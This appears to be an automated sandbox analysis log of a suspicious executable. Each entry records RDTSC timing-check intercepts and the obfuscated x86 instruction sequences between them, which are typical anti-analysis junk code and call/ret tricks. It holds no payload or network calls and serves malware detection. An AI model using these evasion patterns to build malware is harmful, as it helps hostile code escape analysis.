Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C40BE second address: 9C40DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198D0h 0x00000007 push eax 0x00000008 push edx 0x00000009 jc 00007F270C8198C6h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C423F second address: 9C4244 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9BBE8E second address: 9BBECF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F270C8198D5h 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007F270C8198D8h 0x00000010 je 00007F270C8198C8h 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9BBECF second address: 9BBED3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9848F1 second address: 9848F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9C4533 second address: 9C4539 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 99C136 second address: 99C13C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 99C13C second address: 99C140 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 99C140 second address: 99C152 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F270C8198CCh 0x0000000c jns 00007F270C8198C6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CAB18 second address: 9CAB47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push ecx 0x00000009 jmp 00007F270C81A212h 0x0000000e pop ecx 0x0000000f pushad 0x00000010 jmp 00007F270C81A210h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CA082 second address: 9CA087 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CB1CE second address: 9CB1D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CB1D2 second address: 9CB1D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CB1D8 second address: 9CB1DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CB1DD second address: 9CB21C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F270C8198D2h 0x00000014 jmp 00007F270C8198D6h 0x00000019 popad 0x0000001a pop edx 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e pushad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CB21C second address: 9CB232 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F270C81A20Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CB232 second address: 9CB236 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CB236 second address: 9CB257 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F270C81A212h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CB257 second address: 9CB25D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CB3F5 second address: 9CB3F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9CD7B0 second address: 9CD7CB instructions: 0x00000000 rdtsc 0x00000002 jg 00007F270C8198C8h 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F270C8198CFh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 992058 second address: 99205C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 99205C second address: 99207F instructions: 0x00000000 rdtsc 0x00000002 je 00007F270C8198C6h 0x00000008 jmp 00007F270C8198CAh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jmp 00007F270C8198CCh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D4A77 second address: 9D4A82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D4A82 second address: 9D4A87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D4A87 second address: 9D4A95 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F270C81A208h 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D4A95 second address: 9D4A99 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D4D58 second address: 9D4D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F270C81A217h 0x0000000c jnp 00007F270C81A206h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D628A second address: 9D6290 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D6337 second address: 9D6370 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007F270C81A20Ch 0x0000000c jnp 00007F270C81A206h 0x00000012 popad 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jmp 00007F270C81A214h 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F270C81A20Ah 0x00000025 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D655D second address: 9D6564 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D6564 second address: 9D6572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D6572 second address: 9D6576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D6576 second address: 9D657C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D6773 second address: 9D6777 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D6777 second address: 9D677D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D696E second address: 9D6978 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F270C8198C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D6FD0 second address: 9D6FED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C81A219h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D6FED second address: 9D6FF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D6FF3 second address: 9D7040 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F270C81A206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebx 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F270C81A208h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 jne 00007F270C81A213h 0x0000002f mov di, si 0x00000032 nop 0x00000033 push edi 0x00000034 jp 00007F270C81A20Ch 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D733F second address: 9D735D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F270C8198D2h 0x0000000a popad 0x0000000b push eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D74E9 second address: 9D74F7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F270C81A206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D7A73 second address: 9D7B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov dword ptr [esp], eax 0x00000008 jns 00007F270C8198CCh 0x0000000e xor esi, 5010AFFBh 0x00000014 pushad 0x00000015 call 00007F270C8198D7h 0x0000001a mov dword ptr [ebp+122D36B5h], ecx 0x00000020 pop ebx 0x00000021 and esi, 15A92B08h 0x00000027 popad 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push edx 0x0000002d call 00007F270C8198C8h 0x00000032 pop edx 0x00000033 mov dword ptr [esp+04h], edx 0x00000037 add dword ptr [esp+04h], 00000014h 0x0000003f inc edx 0x00000040 push edx 0x00000041 ret 0x00000042 pop edx 0x00000043 ret 0x00000044 call 00007F270C8198D3h 0x00000049 mov edi, 5BDEF840h 0x0000004e pop edi 0x0000004f push 00000000h 0x00000051 mov edi, dword ptr [ebp+122D1CAFh] 0x00000057 xchg eax, ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a jns 00007F270C8198DBh 0x00000060 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D7B0A second address: 9D7B21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F270C81A213h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D93A7 second address: 9D93AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D93AB second address: 9D93AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D93AF second address: 9D93B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D93B9 second address: 9D93BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D9F13 second address: 9D9F1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F270C8198C6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9D9F1E second address: 9D9F3E instructions: 0x00000000 rdtsc 0x00000002 jp 00007F270C81A208h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F270C81A211h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DAA68 second address: 9DAAEA instructions: 0x00000000 rdtsc 0x00000002 jne 00007F270C8198DAh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push eax 0x0000000e call 00007F270C8198C8h 0x00000013 pop eax 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc eax 0x00000021 push eax 0x00000022 ret 0x00000023 pop eax 0x00000024 ret 0x00000025 and edi, dword ptr [ebp+122D2939h] 0x0000002b push 00000000h 0x0000002d jmp 00007F270C8198D9h 0x00000032 push 00000000h 0x00000034 sub dword ptr [ebp+122D36D9h], ecx 0x0000003a xchg eax, ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d push ecx 0x0000003e jmp 00007F270C8198D8h 0x00000043 pop ecx 0x00000044 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DA840 second address: 9DA845 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DB5F1 second address: 9DB5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DA845 second address: 9DA84A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DC057 second address: 9DC05D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DC123 second address: 9DC129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DC129 second address: 9DC12D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DC12D second address: 9DC13E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push edx 0x0000000d pop edx 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DDBBE second address: 9DDBC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DDBC6 second address: 9DDBD7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F270C81A206h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DDBD7 second address: 9DDBFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F270C8198D6h 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DDBFB second address: 9DDC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DE168 second address: 9DE16C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DE16C second address: 9DE1B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a add si, B300h 0x0000000f push 00000000h 0x00000011 mov edi, dword ptr [ebp+122D1B68h] 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push edx 0x0000001c call 00007F270C81A208h 0x00000021 pop edx 0x00000022 mov dword ptr [esp+04h], edx 0x00000026 add dword ptr [esp+04h], 00000017h 0x0000002e inc edx 0x0000002f push edx 0x00000030 ret 0x00000031 pop edx 0x00000032 ret 0x00000033 mov si, bx 0x00000036 sub dword ptr [ebp+1247B570h], ebx 0x0000003c xchg eax, ebx 0x0000003d pushad 0x0000003e push eax 0x0000003f push edx 0x00000040 push edi 0x00000041 pop edi 0x00000042 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DE1B3 second address: 9DE1C0 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F270C8198C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DE1C0 second address: 9DE1CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DE1CD second address: 9DE1D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9DE1D1 second address: 9DE1D7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E20D9 second address: 9E20DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E3628 second address: 9E367F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push ecx 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d pop ecx 0x0000000e nop 0x0000000f mov edi, dword ptr [ebp+12454C21h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F270C81A208h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000017h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 xor dword ptr [ebp+1245B011h], esi 0x00000037 push 00000000h 0x00000039 mov ebx, edx 0x0000003b jmp 00007F270C81A20Dh 0x00000040 xchg eax, esi 0x00000041 pushad 0x00000042 push eax 0x00000043 push edx 0x00000044 jnc 00007F270C81A206h 0x0000004a rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E283A second address: 9E2849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F270C8198C6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E469E second address: 9E46A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E46A4 second address: 9E46BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 je 00007F270C8198C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007F270C8198C8h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E46BD second address: 9E46ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jnc 00007F270C81A206h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f mov ebx, dword ptr [ebp+122D237Ah] 0x00000015 jmp 00007F270C81A20Dh 0x0000001a push 00000000h 0x0000001c stc 0x0000001d push eax 0x0000001e jo 00007F270C81A214h 0x00000024 push eax 0x00000025 push edx 0x00000026 push edi 0x00000027 pop edi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E391B second address: 9E3934 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F270C8198D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E56DE second address: 9E56E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E56E3 second address: 9E56E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E56E9 second address: 9E5785 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a movzx edi, di 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F270C81A208h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e jmp 00007F270C81A20Dh 0x00000033 mov edi, edx 0x00000035 mov dword ptr fs:[00000000h], esp 0x0000003c js 00007F270C81A214h 0x00000042 pushad 0x00000043 sub ecx, dword ptr [ebp+122D2959h] 0x00000049 sub dword ptr [ebp+122D371Ah], edi 0x0000004f popad 0x00000050 mov eax, dword ptr [ebp+122D129Dh] 0x00000056 call 00007F270C81A20Bh 0x0000005b jmp 00007F270C81A219h 0x00000060 pop edi 0x00000061 push FFFFFFFFh 0x00000063 pushad 0x00000064 add dword ptr [ebp+1247AFA2h], edx 0x0000006a mov edx, ecx 0x0000006c popad 0x0000006d nop 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 push esi 0x00000072 pop esi 0x00000073 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E5785 second address: 9E57A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F270C8198D0h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E57A2 second address: 9E57A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BEd2lJRXFM.exe	RDTSC instruction interceptor: First address: 9E73B7 second address: 9E73BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
